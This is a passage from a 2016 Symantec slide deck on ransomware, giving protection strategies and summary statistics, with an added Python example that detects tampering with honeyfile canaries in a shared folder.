Retail 4.3%
Construction 3.9%
Mining 1.0%
Agri, Forestry, & Fishing 0.5%
What about Healthcare? Healthcare is seeing more targeted attacks and is therefore not reflected in the numbers
Slide 22: Crypto is difficult (for most people)
Slide 23: Protection strategies
• Back up your data (out of reach!)
• Keep your system and software up to date
• Double-check shared folders
  – Does it auto-sync to the cloud?
  – How is your file server protected?
• Follow best practices (2FA, security software, …)
  – Disable scripts, PowerShell etc. if you don't use them
• Be prepared – play the exercise drill
• Some have experimented with «honeyfiles» and «folder sinkholes»
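One way to build the «honeyfiles» idea from this slide: seed canary files whose names sort to the start and end of a share, record their hashes, and alert when one is overwritten, renamed or deleted, which is what a cryptolocker walking the folder does first. This is an added example, not code from the slides; the canary names and contents are constructed, and the self-test tampers with its own files in a scratch directory.

```python
import hashlib
import os
import tempfile

# Constructed names chosen to sort first and last in a directory listing, so a
# locker that walks the folder alphabetically touches them early.
CANARY_NAMES = ("!00_accounts_2016.xlsx", "zzz_payroll_backup.docx")
CANARY_BYTES = b"HONEYFILE - do not open or modify. Contact the security team.\n"


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def seed_canaries(directory):
    """Write the canary files into `directory`; return a {path: sha256} baseline."""
    baseline = {}
    for name in CANARY_NAMES:
        path = os.path.join(directory, name)
        with open(path, "wb") as fh:
            fh.write(CANARY_BYTES)
        baseline[path] = _sha256(path)
    return baseline


def check_canaries(baseline):
    """Compare the files on disk against the baseline; return a list of alert strings."""
    alerts = []
    for path, digest in baseline.items():
        directory, name = os.path.split(path)
        if not os.path.exists(path):
            # Many lockers rename what they encrypt (name.locked, name.crypt);
            # report the new name when the original prefix is still there.
            siblings = os.listdir(directory) if os.path.isdir(directory) else []
            renamed = [f for f in siblings if f.startswith(name) and f != name]
            what = f"renamed to {renamed[0]}" if renamed else "deleted"
            alerts.append(f"{path}: canary {what}")
        elif _sha256(path) != digest:
            alerts.append(f"{path}: canary modified (content changed, possible encryption)")
    return alerts


def run_self_test():
    """Seed canaries in a scratch directory, then tamper with them the way a
    locker would (overwrite one, rename the other); return (before, after) alerts."""
    with tempfile.TemporaryDirectory() as scratch:
        baseline = seed_canaries(scratch)
        before = check_canaries(baseline)
        first, second = sorted(baseline)
        with open(first, "wb") as fh:
            fh.write(b"\x00" * 64)            # simulated ciphertext
        os.rename(second, second + ".locked")  # simulated rename after encryption
        after = check_canaries(baseline)
    return before, after


if __name__ == "__main__":
    clean, tampered = run_self_test()
    print("clean run:", clean or "no alerts")
    for line in tampered:
        print("ALERT", line)
```

In production the baseline would be stored off the share and `check_canaries` run on a schedule, with an alert feeding the incident process rather than just printing.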
Slide 24: Don't forget your phones
• Android ransomware is out there
• IoT device ransomware not seen at large in the wild, but possible
Slide 25: Summary – keep your data safe!
• 100 new families identified in 2015, most not sophisticated
• Scripts are popular to evade first-step detection
• Employees in organizations represent 43% of infections
• There are ransomware groups going after organizations
• Most attacks are not targeted, but still devastating
• It is profitable for the attackers, so it won't go away overnight
Slide 26: Thank you!
Candid Wüest, Threat Researcher - Symantec Security Response
Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.